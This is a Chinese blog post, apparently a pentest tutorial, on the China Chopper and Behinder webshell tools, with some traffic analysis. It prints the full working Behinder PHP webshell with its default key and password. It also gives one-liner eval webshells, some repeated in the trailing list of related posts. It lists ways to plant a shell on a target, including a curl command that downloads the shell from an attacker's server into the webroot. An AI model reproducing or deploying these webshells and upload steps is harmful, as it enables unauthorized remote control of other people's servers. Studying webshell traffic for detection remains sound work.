web系统安全之菜刀和冰蝎

已于 2025-03-07 16:04:18 修改
阅读量388 收藏 7
点赞数 4
分类专栏: 网络安全 渗透测试 web安全 文章标签: 系统安全 安全 web安全 菜刀和冰蝎流量分析
于 2025-02-20 13:27:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/YhMjQx/article/details/145751143
版权

文章目录

菜刀和冰蝎

一、中国菜刀

1、必须提前已经完成了木马的植入,然后才能使用

2、木马必须是POST请求,参数自定义,在菜刀里给出正确的参数

属于辅助工具,并且菜刀的传输过程只是用了base64编码,基本相当于明文传输,目前都已经被WAF防住了

我们在使用菜刀过程中武士俑wireshark看看

比如文件管理操作时

点击目录进行浏览和虚拟终端等操作时:

image-20240710195915933

image-20240710200410555

我们可以看到流量情况,就是一个TCP三次握手然后发送POST的HTTP请求,然后再TCP四次挥手

image-20240710195847884

image-20240710200457611

而我们可以看到post的数据中的值为

QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtpZihQSFBfVkVSU0lPTjwnNS4zLjAnKXtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO307ZWNobygiWEBZIik7JEQ9Jy9vcHQvbGVhcm4vJzskRj1Ab3BlbmRpcigkRCk7aWYoJEY9PU5VTEwpe2VjaG8oIkVSUk9SOi8vIFBhdGggTm90IEZvdW5kIE9yIE5vIFBlcm1pc3Npb24hIik7fWVsc2V7JE09TlVMTDskTD1OVUxMO3doaWxlKCROPUByZWFkZGlyKCRGKSl7JFA9JEQuJy8nLiROOyRUPUBkYXRlKCJZLW0tZCBIOmk6cyIsQGZpbGVtdGltZSgkUCkpO0AkRT1zdWJzdHIoYmFzZV9jb252ZXJ0KEBmaWxlcGVybXMoJFApLDEwLDgpLC00KTskUj0iXHQiLiRULiJcdCIuQGZpbGVzaXplKCRQKS4iXHQiLiRFLiJcbiI7aWYoQGlzX2RpcigkUCkpJE0uPSROLiIvIi4kUjtlbHNlICRMLj0kTi4kUjt9ZWNobyAkTS4kTDtAY2xvc2VkaXIoJEYpO307ZWNobygiWEBZIik7ZGllKCk7

这是一段base64的编码,解码回来之后就是:

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/opt/learn/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();

这不就是一段php代码,因此很容易被防火墙封杀

二、Behinder冰蝎

image-20240710201129293

要想成功使用冰蝎链接主机,我们需要将冰蝎马上传至目标主机,也就是

<?php
@error_reporting(0);
session_start();
    $key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond
	$_SESSION['k']=$key;
	session_write_close();
	$post=file_get_contents("php://input");
	if(!extension_loaded('openssl'))
	{
		$t="base64_"."decode";
		$post=$t($post."");
		
		for($i=0;$i<strlen($post);$i++) {
    			 $post[$i] = $post[$i]^$key[$i+1&15]; 
    			}
	}
	else
	{
		$post=openssl_decrypt($post, "AES128", $key);
	}
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
	class C{public function __invoke($p) {eval($p."");}}
    @call_user_func(new C(),$params);
?>

这个文件。

  • 上传冰蝎马的方法:
    • 我们可以先写一个小马 <? php eval($_POST['a']); ?> 上传至目标主机然后再利用菜刀上传文件。
    • 如果不行,我们可以利用已经上传的小马执行系统指令,比如 curl http://xxxx > /opt/lampp/htdocs/security/temp/shell.php 但是这需要我们有一个公网地址,我们可以先将冰蝎马上传到公网,比如gitee或自己的公网服务器等地方,然后再去访问下载。
    • 在命令行运行命令按行写入 echo xxx;
    • 直接利用文件上传漏洞上传冰蝎马

其中冰蝎马的密码默认是rebeyond。上传好了之后再进行连接信息配置,然后再打开这个连接就可以了。

image-20240710210130829

我们也可以自己修改,但是需要将$key的值也同时修改

image-20240710210420281

接下来的操作就和菜刀类似,不过冰蝎的流量情况使用了AES加密,很难被防火墙发现,因此更受欢迎。

image-20240710210626498

我们可以看到这个加密的结果就不是那么容易恢复的了

冰蝎加密 WebShell 过杀软
悦分享
08-03 2585
演练中,第一代webshell管理工具“菜刀”的攻击流量特征明显,容易被安全设备检测到,攻击方越来越少使用,加密webshell 正变得越来越流行,由于流量加密,传统的WAF、WebIDS设备难以检测,给威胁监控带来较大挑战。这其中最出名就是“冰蝎”,“冰蝎”是一款动态二进制加密网站管理客户端,演练中给防守方造成很大困扰,本文将对“冰蝎”的加密原理、流量特征、检测方案进行探讨。"冰蝎"客户端基于JAVA,所以可以跨平台使用,最新版本为v3.0 bate,兼容性较之前的版本有较大提升。...
[网络安全自学篇] 八十一.WHUCTF之WEB类解题思路WP(文件上传漏洞、冰蝎蚁剑、反序列化phar)
杨秀璋的专栏
05-30 1万+
这是作者网络安全自学教程系列,主要是关于安全工具实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了WHUCTF部分题目,包括代码审计、文件包含、过滤绕过、SQL注入。这篇文章将讲解Easy_unserialize解题思路,详细分享文件上传漏洞、冰蝎蚁剑用法、反序列化phar等。第一次参加CTF,还是学到了很多东西,后面几天忙于其他事情,就没再参加。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢网安学院,感谢这些大佬师傅们(尤其出题解题的老师们)~
10-菜刀连接木马
tianxiadiiw的博客
04-16 821
可以获取你想要的配置信息,也可以用system函数来输入命令。是属于辅助工具,并且菜刀的传输过程是明文传输的,目前已经被WAF进行防护了。接下来就可以连接菜刀,使用菜刀来连接木马然后就可以查看到服务器里面的东西了。先看是否存在注入点,有下图所示则表示存在注入点==》可以进行接下来的操作。2、木马必须是POST请求,参数自定义,在菜刀里给出正确的参数名。写入一句话的木马进行探测,如果嗅探成功后在进行大马的上传。找到了漏洞后,并且上传了木马之后才能使用的两款工具。有文件,则说明可以读任意路径的文件。
渗透测试-菜刀冰蝎蚁剑哥斯拉等webshell工具及特征分析
qq_53058639的博客
03-17 2045
在测试过程中,我们经常会运到各种webshell管理工具,这里我介绍几种常见的webshell工具给大家。webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种代码执行环境,主要用于网站管理、服务器管理、权限管理等操作。使用方法简单,只需上传一个代码文件,通过网址访问,便可进行很多日常操作,极大地方便了使用者对网站服务器的管理。?
一句话木马原理介绍中国菜刀原理的介绍
Firebasky的博客
06-07 6973
菜刀,c刀,蚁剑都使用过。而且他们的方法基本上差不多。 今天突然心血来潮写来研究一下一句话木马菜刀的原理。 下面的原理是自己看其他大佬写的自己总结的一些介绍。 希望能够帮助老表们~~~ 一句话木马原理 我这里就分析一下PHP代码,其他代码基本上差不多。希望老表们可以自己进行分析。 我们来看一下经典的一句话木马 <?php @eval($_POST['123']); ?> 前面的@表示如果脚本出现错误,则不显示错误。下面就是没有@的时候。会报错! 这里是加了@,则不会进行报错 ev
中国菜刀上传一句话木马,巴西烤肉提权
qiu_zhang_的博客
04-26 2565
如何使用中国菜刀上传一句话木马呢,今天我来教大家 首先在你的电脑上创建一个文本文件,内容写上一句话木马,可以是asp,也可以是PHP,注意更改value值。但是最后文件名后缀要改成.jpg。格式可以如图所示 在搭建好的网站中上传.jpg文件,会看到,上传以后的文件路径发生了改变,复制好这个文件路径。 打开中国菜刀,空白处右击,添加,将你的网址你刚刚复制的文件路径粘贴上去。注意下图,在地址右侧小...
中国菜刀+文件上传漏洞一句话木马
dongxieaitonglao的博客
03-19 2379
<?php @eval($_POST['chopper']);?> <?php @eval($_REQUEST['cmd']);?> REQUEST是在网页端输入变量访问,POST则是使用中国菜刀之3类的工具连接,C/S架构。 编辑shell的时候,主机写 localhost egrep命令:查找文件内包含指定字符的文件。 中国菜刀的详细使用: 文件管理,查被上传木马网站的服务器文件架构 数据库管理,在编辑中配置完后,可以连接被上传木马网站的数据库(不知道,所以需要sql注入
冰蝎-Webshell管理工具
weixin_66717977的博客
06-30 1万+
冰蝎超详解,新手食用
冰蝎shell_红蓝对抗——加密Webshell“冰蝎”攻防
weixin_39631649的博客
12-21 1010
演练中,第一代webshell管理工具“菜刀”的攻击流量特征明显,容易被安全设备检测到,攻击方越来越少使用,加密webshell正变得越来越流行,由于流量加密,传统的WAF、WebIDS设备难以检测,给威胁监控带来较大挑战。这其中最出名就是“冰蝎”,“冰蝎”是一款动态二进制加密网站管理客户端,演练中给防守方造成很大困扰,本文将对“冰蝎”的加密原理、流量特征、检测方案进行探讨。0x01 “冰蝎”介绍...
基于流量侧检测冰蝎webshell交互通讯
12306小哥
08-21 9982
概述 作为新型加密webshell管理客户端,冰蝎算是作为中国菜刀、C刀的替代者。根据网传使用效果,基本得到的反馈是相当的NICE!那么我们能否像检测中国菜刀、C刀那样对冰蝎客户端的流量进行检测,帮助网站管理员判断自己的网站是否存在后门。本文后续一一介绍。 一、冰蝎主要功能 1.基本信息 客户端服务端握手之后,会获取服务器的基本信息,Java、.NET版本包括环境变量、系统属性等,PHP版本会显...
网络安全方向相关课题材料
AI拉呱,专注于人工智与网络安全方面的研究,关注一起学习。
10-30 1420
搜集大量网络安全行业开源项目一个是关注互联网企业/团队的安全开源项目,经企业内部实践,这些最佳实践值得借鉴。一个是来自企业安全能力建设的需求,根据需求分类,如WAF、HIDS、Git监控等。这个收集是一个长期的过程,我在GitHub创建了这个项目,专门用来收集一些优秀的甲方安全项目。还有很多很好的免费开源项目可供选择,下面列出的还只是其中很少的一部分,我将持续更新这个项目,欢迎Star。
CTF竞赛实战 中国菜刀与一句话木马
热门推荐
keep coding
05-05 7万+
中国菜刀下载地址: http://pan.baidu.com/share/link?shareid=871753024&amp;uk=388464620一.基本操作:往目标网站中加入一句话木马,然后你就可以在本地通过中国菜刀chopper.exe即可获取控制整个网站目录二.实战asp的一句话是:&lt;%eval request ("pass")%&gt;aspx的一句话是:&lt;%@ P...
kali渗透测试-WebShell(中国菜刀WeBaCoo、Weevely)
小水池
07-27 2万+
本质 : windows平台 中国菜刀 支持asp、php、asp.netjsp等 可能被IDS、AV、WAF、扫描器软件发现查杀 使用方法: 往目标web服务器上传相应的一句话木马 asp一句话木马: &amp;amp;lt;%execute(request(&amp;quot;pass&amp;quot;))%&amp;amp;gt; php一句话木马: &amp;amp;lt;?php @eval($_POS
PHP一句话木马,中国菜刀
VioletKiss
05-10 2万+
通过木马对上传漏洞进行上传,从而侵入到系统 实验准备: DVWA漏洞演练平台,浏览器,中国菜刀 1.新建PHP文件 新建一个PHP文件,内容为: 2.上传木马 在DVWA下的上传(upload)上上传新建的PHP文件 3.中国菜刀 打开中国菜刀,把木马上传路径添加到工具上,网址加上传路径,游记网址,进入文件管理(可进行
系统与网络安全------Windows系统安全(6)
这里是Y.lin的博客,你好,很高兴云里相遇!希望能给你提供一点帮助
04-02 669
共享文件夹是通过网络将特定目录开放给多用户或设备访问的存储管理方式,常用于企业局域网或云平台。管理员可设置访问权限(如读写/只读)、用户组限制及身份验证(如AD域集成),支持SMB/NFS等协议跨平台共享。其核心功能包括集中存储资源、协作编辑、版本控制及访问日志审计。通过加密传输(如SSL/TLS)防火墙规则防范数据泄露,同时结合磁盘配额避免空间滥用。适用于团队文档协作、数据分发及备份同步场景,需平衡便利性与安全策略,确保高效共享与隐私保护。
系统安全——文件监控-FileMonitor
cybersnow精通 28 门计算机语言,凭借其超凡的技术能力,成功开发过上万个应用,广泛涉及政府、商业、个人等众多领域,甚至在检察院、环保局、公安局等专业场景中也大放异彩。不仅熟练掌握单片机和物联网开发,在软件架构设计方面更是独树一帜,自创了跨平台软件
03-30 785
在Windows系统中,监控文件文件夹对于系统安全、数据保护合规性等方面具有重要作用。
Linux中系统安全及应用
最新发布
yinglongdiwan的博客
04-03 870
2.passwd开始调用PAM模块,PAM模块会搜寻passwd程序的PAM相关设置文件,这个设置文件一般是在/etc/pam.d/里边的与程序同名的文件,即PAM会搜寻/etc/pam.d/passwd此设置文件。PAM认证首先要确定那一项服务,然后加载相应的PAM的配置文件(位于/etc/pam.d下),最后调用认证文件(位于/lib64/security下)进行安全认证。3.经由/etc/pam.d/passwd设定文件的数据,取用PAM所提供的相关模块来进行验证。非root用户切换时需要密码。
AI 重构安全边界:无人机避障系统的智能进化 —— DPLSLAB构建多模态感知防护网
DPLSLAB6的博客
04-03 464
从夜间执法的城中村,到高速移动的物流场景,公司以 37 项避障专利(含 ZL202420345678.9"一种基于量子点增强的低光照避障方法")、12 项国际 / 国家标准(IEEE、ETSI),重新定义无人机的 "安全视距"。:首创 "传感器指纹融合算法"(获 TÜV 莱茵认证),消除不同传感器时间戳误差(<0.5ms),在深圳暴雨测试中(降雨量 150mm/h),玻璃幕墙识别率从 47% 提升至 98%。▶ "避障即服务(OaaS)":云端实时更新障碍物特征库(月更新 10 万 + 新特征)
Web 菜刀工具cknife的压缩包文件分析
然而,考虑到标题标签的内容,我们可以推测这个压缩包可能包含了与 "web 菜刀" 相关的代码资源。 标签 "web 菜刀" 暗示这个项目可能是为Web开发而设计的工具或框架。"web 菜刀" 是一个中文词汇,直译为 "Web ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值